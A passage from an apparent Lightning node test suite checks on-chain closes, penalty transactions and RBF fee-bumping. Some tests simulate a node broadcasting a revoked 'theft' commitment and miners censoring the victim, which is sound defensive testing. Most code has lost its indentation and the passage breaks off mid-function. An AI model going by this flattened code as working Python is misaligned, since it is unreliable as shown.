route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
    # start l2 (now rolled back a bit) and force close the channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv_2['payment_hash']))
    # l2 proceeds with the onchain close of the l3 channel
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    # after 5 blocks, l2 reclaims both the HTLC-success tx's DELAYED_OUTPUT_TO_US and the unilateral's delayed to-us output
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
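# Both penalty tests above freeze an HTLC in flight by routing a payment to a
# node whose dev_disconnect is '-WIRE_UPDATE_FULFILL_HTLC'.  A sketch of that
# pattern as a helper (hypothetical, not used by the tests; `label` must be
# unique among the destination's invoices):
def send_sticky_htlc(src, dst, amt, label):
    """Send an HTLC from src to dst that dst will never fulfill."""
    inv = dst.rpc.invoice(amt, label, 'sticky')
    route = src.rpc.getroute(dst.info['id'], amt, 1)['route']
    src.rpc.sendpay(route, inv['payment_hash'], payment_secret=inv['payment_secret'])
    # The disconnect fires just before dst would send the fulfill.
    dst.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
    return inv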
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
        # l2 should RBF, twice even: once for the l1 main output,
        # once for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
        # Broadcast via the bcli interface, so that code path gets exercised too.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert(len(l2.rpc.listfunds()['outputs']) >= 1)
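# The test above and test_penalty_rbf_burn below simulate censoring miners by
# mocking out l2's sendrawtransaction so penalty broadcasts silently go
# nowhere, then restoring the passthrough.  A sketch of that pattern as a
# pair of helpers (hypothetical, not used by the tests):
def start_censoring(node):
    """Swallow the node's sendrawtransaction calls (simulated censoring miners)."""
    def censoring_sendrawtx(r):
        # Pretend the broadcast succeeded without relaying anything.
        return {'id': r['id'], 'result': {}}
    node.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)


def stop_censoring(node):
    """Restore the real sendrawtransaction passthrough."""
    node.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)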
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
        # l2 should RBF, twice even: once for the l1 main output,
        # once for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert(len(l2.rpc.listfunds()['outputs']) == 0)
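# Both RBF tests above define the same nested get_rbf_tx() helper to pull the
# raw RBF transaction hex out of onchaind's broadcast log line.  The same
# thing as a module-level sketch (hypothetical; the tests keep their own
# copies):
def get_rbf_tx_from_log(node, depth, name, resolve):
    """Return the raw tx hex broadcast as an RBF of `name` resolving `resolve` at `depth`."""
    line = node.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
                                    .format(name, resolve, depth))
    return re.search(r'.* \(([0-9a-fA-F]*)\)', line).group(1)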
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
    # 10 blocks later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 94 blocks later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
    # 10 blocks later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
    # Wait for nodes to notice the failure; this search needle is after the
    # DB commit, so we're sure the tx entries in channeltxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(121)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
    # 6 blocks later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 94 blocks later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
    # 2 blocks later, l1 spends the HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
    # 89 blocks later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
    # Three more blocks, and l2 can spend its to-us output.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
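# This test and the two unilateral variants below all run sendpay in a daemon
# thread and hand any exception back over a queue.  A sketch of that pattern
# as a helper (hypothetical, not used by the tests; the caller joins the
# thread and re-raises from the queue, as the tests do inline):
def start_background_pay(node, route, rhash, payment_secret):
    """Run sendpay then waitsendpay in a daemon thread; put the error (or None) on a queue."""
    q = queue.Queue()

    def try_pay():
        try:
            node.rpc.sendpay(route, rhash, payment_secret=payment_secret)
            node.rpc.waitsendpay(rhash)
            q.put(None)
        except Exception as err:
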